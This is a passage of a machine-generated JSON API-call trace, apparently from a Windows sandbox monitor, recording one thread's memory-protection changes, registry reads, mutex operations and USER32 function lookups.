"0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 574 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 575 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\CTF\\Compatibility\\AppCompatClassName" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\AppCompatClassName" } ], "repeated": 0, "id": 576 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e108f", "parentcaller": "0x7568572d", "category": "synchronization", "api": "NtOpenEvent", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "Handle", "value": "0x00000000" }, { "name": "EventName", "value": "Local\\1ImmersiveFocusTrackingActiveEvent" } ], "repeated": 0, "id": 577 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x757332bc", "parentcaller": "0x75732de1", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x040a0c0a", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 578 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 579 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 580 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 581 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002e4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\CTF\\" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\" } ], "repeated": 0, "id": 582 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002e4" }, { "name": "ValueName", "value": "EnableAnchorContext" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\CTF\\EnableAnchorContext" } ], "repeated": 0, "id": 583 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f46db", "parentcaller": "0x756a2371", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002e4" } ], "repeated": 0, "id": 584 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x738ecbf8", "parentcaller": "0x738d836f", "category": "misc", "api": "GetSystemInfo", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 585 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650c041", "parentcaller": "0x738ecc31", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06190000" }, { "name": "RegionSize", "value": "0x00800000" }, { "name": "Protection", "value": "0x00000001", "pretty_value": "PAGE_NOACCESS" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 586 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x738f6604", "parentcaller": "0x738ea6ee", "category": "misc", "api": "GetSystemInfo", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 587 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x738e053a", "parentcaller": "0x738d836f", "category": "misc", "api": "NtQuerySystemInformation", "status": true, "return": "0x00000000", "arguments": [ { "name": "SystemInformationClass", "value": "58" } ], "repeated": 0, "id": 588 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764fdce4", "parentcaller": "0x738af264", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x000002f4" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 589 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0073b000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 590 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02277000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 591 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02278000" }, { "name": "RegionSize", "value": "0x00007000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 592 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e0bbf", "parentcaller": "0x738e792e", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 593 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738f0e06", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77182560" } ], "repeated": 0, "id": 594 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738edfdb", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c4820" } ], "repeated": 0, "id": 595 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738ee089", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180780" } ], "repeated": 0, "id": 596 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738e79df", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc9f0" } ], "repeated": 0, "id": 597 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738eec85", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5a30" } ], "repeated": 0, "id": 598 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738e799c", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 599 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e15a7", "parentcaller": "0x738f17ec", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x000002fc" }, { "name": "MutexName", "value": "Local\\SM0:9224:168:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 600 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x738f1eb3", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002fc" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 601 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 602 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000300" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 603 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e254a", "parentcaller": "0x738eeddf", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000300" } ], "repeated": 0, "id": 604 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764de6a0", "parentcaller": "0x738eee06", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002fc" } ], "repeated": 1, "id": 605 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x738ac5ef", "parentcaller": "0x738b8775", "category": "system", "api": "GetSystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 606 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0073c000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 607 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764fdce4", "parentcaller": "0x738b931d", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0xfffffffe" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000320" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 608 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764e0bbf", "parentcaller": "0x738bf3eb", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ext-ms-win-rtcore-ntuser-window-ext-l1-1-0.dll" }, { "name": "ModuleHandle", "value": "0x76610000" } ], "repeated": 0, "id": 609 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 610 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsGUIThread" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76650ed0" } ], "repeated": 0, "id": 611 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 612 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 613 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "RegisterClassExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663ecd0" } ], "repeated": 0, "id": 614 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 615 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x0073d000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 616 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 617 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "CreateWindowExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663ff10" } ], "repeated": 0, "id": 618 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 619 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 620 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "DefWindowProcW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771d8630" } ], "repeated": 0, "id": 621 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 622 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 623 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetWindowLongW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645e90" } ], "repeated": 0, "id": 624 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 625 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 626 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "SetTimer" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664f510" } ], "repeated": 0, "id": 627 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 628 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 629 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x738fa13a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "" }, { "name": "Ordinal", "value": "2612" }, { "name": "FunctionAddress", "value": "0x76651240" } ], "repeated": 0, "id": 630 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": "0x7650b8ba", "parentcaller": "0x738f9e6f", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 631 }, { "timestamp": "2025-02-27 23:34:15,972", "thread_id": "3892", "caller": 